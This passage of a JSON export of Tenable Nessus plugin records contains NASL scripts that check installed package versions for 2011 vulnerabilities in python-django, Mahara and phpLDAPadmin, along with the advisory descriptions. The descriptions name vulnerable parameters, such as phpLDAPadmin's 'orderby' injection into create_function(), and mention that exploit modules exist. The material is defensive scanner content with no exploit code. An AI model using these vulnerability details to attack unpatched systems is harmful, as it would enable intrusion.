Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-12-09T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : python-django vulnerabilities (USN-1297-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:python-django", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10"], "id": "UBUNTU_USN-1297-1.NASL", "href": "https://www.tenable.com/plugins/nessus/57061", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1297-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57061);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_bugtraq_id(49573);\n script_xref(name:\"USN\", value:\"1297-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : python-django vulnerabilities (USN-1297-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pall McMillan discovered that Django used the root namespace when\nstoring cached session data. A remote attacker could exploit this to\nmodify sessions. 
(CVE-2011-4136)\n\nPaul McMillan discovered that Django would not timeout on arbitrary\nURLs when the application used URLFields. This could be exploited by a\nremote attacker to cause a denial of service via resource exhaustion.\n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of\na URL via a HEAD request, it would instead use a GET request for the\ntarget of a redirect. This could potentially be used to trigger\narbitrary GET requests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's HTTP\nHost header to construct a full URL. A remote attacker could exploit\nthis to conduct host header cache poisoning attacks via a crafted\nrequest. (CVE-2011-4139).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1297-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-django package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"python-django\", pkgver:\"1.1.1-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"python-django\", pkgver:\"1.2.3-1ubuntu0.2.10.10.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"python-django\", pkgver:\"1.2.5-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"python-django\", pkgver:\"1.3-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-django\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:42", "description": "Several vulnerabilities were discovered in Mahara, an electronic portfolio, weblog, and resume builder :\n\n - CVE-2011-2771 Teemu Vesala discovered that missing input sanitising of RSS feeds could lead to cross-site scripting.\n\n - CVE-2011-2772 Richard Mansfield discovered that insufficient upload restrictions allowed denial of service.\n\n - CVE-2011-2773 Richard Mansfield discovered that the management of institutions was prone to cross-site request forgery.\n\n - (no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation vulnerability in MNet handling.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-07T00:00:00", "type": "nessus", "title": "Debian DSA-2334-1 : mahara - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2771", "CVE-2011-2772", "CVE-2011-2773"], "modified": "2021-01-11T00:00:00", "cpe": 
["p-cpe:/a:debian:debian_linux:mahara", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2334.NASL", "href": "https://www.tenable.com/plugins/nessus/56714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2334. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56714);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_xref(name:\"DSA\", value:\"2334\");\n\n script_name(english:\"Debian DSA-2334-1 : mahara - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder :\n\n - CVE-2011-2771\n Teemu Vesala discovered that missing input sanitising of\n RSS feeds could lead to cross-site scripting.\n\n - CVE-2011-2772\n Richard Mansfield discovered that insufficient upload\n restrictions allowed denial of service.\n\n - CVE-2011-2773\n Richard Mansfield discovered that the management of\n institutions was prone to cross-site request forgery.\n\n - (no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation\n vulnerability in MNet handling.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2771\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2011-2772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/mahara\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2334\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mahara packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mahara\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"mahara\", reference:\"1.0.4-4+lenny11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara\", reference:\"1.2.6-2+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara-apache2\", reference:\"1.2.6-2+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara-mediaplayer\", reference:\"1.2.6-2+squeeze3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:35", "description": "Update to the latest upstream development code to fix CVE-2011-4074 and CVE-2011-4075 (XSS and code injection vulnerabilities in versions <= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-26T00:00:00", "type": "nessus", "title": "Fedora 16 : phpldapadmin-1.2.1.1-2.20111006git.fc16 (2011-14924)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpldapadmin", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2011-14924.NASL", "href": "https://www.tenable.com/plugins/nessus/56934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14924.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56934);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14924\");\n\n script_name(english:\"Fedora 16 : phpldapadmin-1.2.1.1-2.20111006git.fc16 (2011-14924)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069708.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84bb798e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:27", "description": "Update to the latest upstream development code to fix CVE-2011-4074 and CVE-2011-4075 (XSS and code injection vulnerabilities in versions <= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-26T00:00:00", "type": "nessus", "title": "Fedora 14 : phpldapadmin-1.2.1.1-2.20111006git.fc14 (2011-14986)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpldapadmin", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-14986.NASL", "href": "https://www.tenable.com/plugins/nessus/56935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14986.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56935);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14986\");\n\n script_name(english:\"Fedora 14 : phpldapadmin-1.2.1.1-2.20111006git.fc14 (2011-14986)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069724.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78d671d2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:37", "description": "Two vulnerabilities have been discovered in phpLDAPadmin, a web-based interface for administering LDAP servers. 
The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2011-4074 Input appended to the URL in cmd.php (when 'cmd' is set to '_debug') is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.\n\n - CVE-2011-4075 Input passed to the 'orderby' parameter in cmd.php (when 'cmd' is set to 'query_engine', 'query' is set to 'none', and 'search' is set to e.g. '1') is not properly sanitised in lib/functions.php before being used in a 'create_function()' function call. This can be exploited to inject and execute arbitrary PHP code.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-31T00:00:00", "type": "nessus", "title": "Debian DSA-2333-1 : phpldapadmin - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:phpldapadmin", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2333.NASL", "href": "https://www.tenable.com/plugins/nessus/56672", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2333. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56672);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_bugtraq_id(50331);\n script_xref(name:\"DSA\", value:\"2333\");\n\n script_name(english:\"Debian DSA-2333-1 : phpldapadmin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities have been discovered in phpLDAPadmin, a web-based\ninterface for administering LDAP servers. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2011-4074\n Input appended to the URL in cmd.php (when 'cmd' is set\n to '_debug') is not properly sanitised before being\n returned to the user. This can be exploited to execute\n arbitrary HTML and script code in a user's browser\n session in context of an affected site.\n\n - CVE-2011-4075\n Input passed to the 'orderby' parameter in cmd.php (when\n 'cmd' is set to'query_engine', 'query' is set to 'none',\n and 'search' is set to e.g.'1') is not properly\n sanitised in lib/functions.php before being used in\n a'create_function()' function call. 
This can be\n exploited to inject and execute arbitrary PHP code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=646754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/phpldapadmin\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2333\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpldapadmin packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 1.2.0.5-2+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"phpldapadmin\", reference:\"1.1.0.5-6+lenny2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"phpldapadmin\", reference:\"1.2.0.5-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": 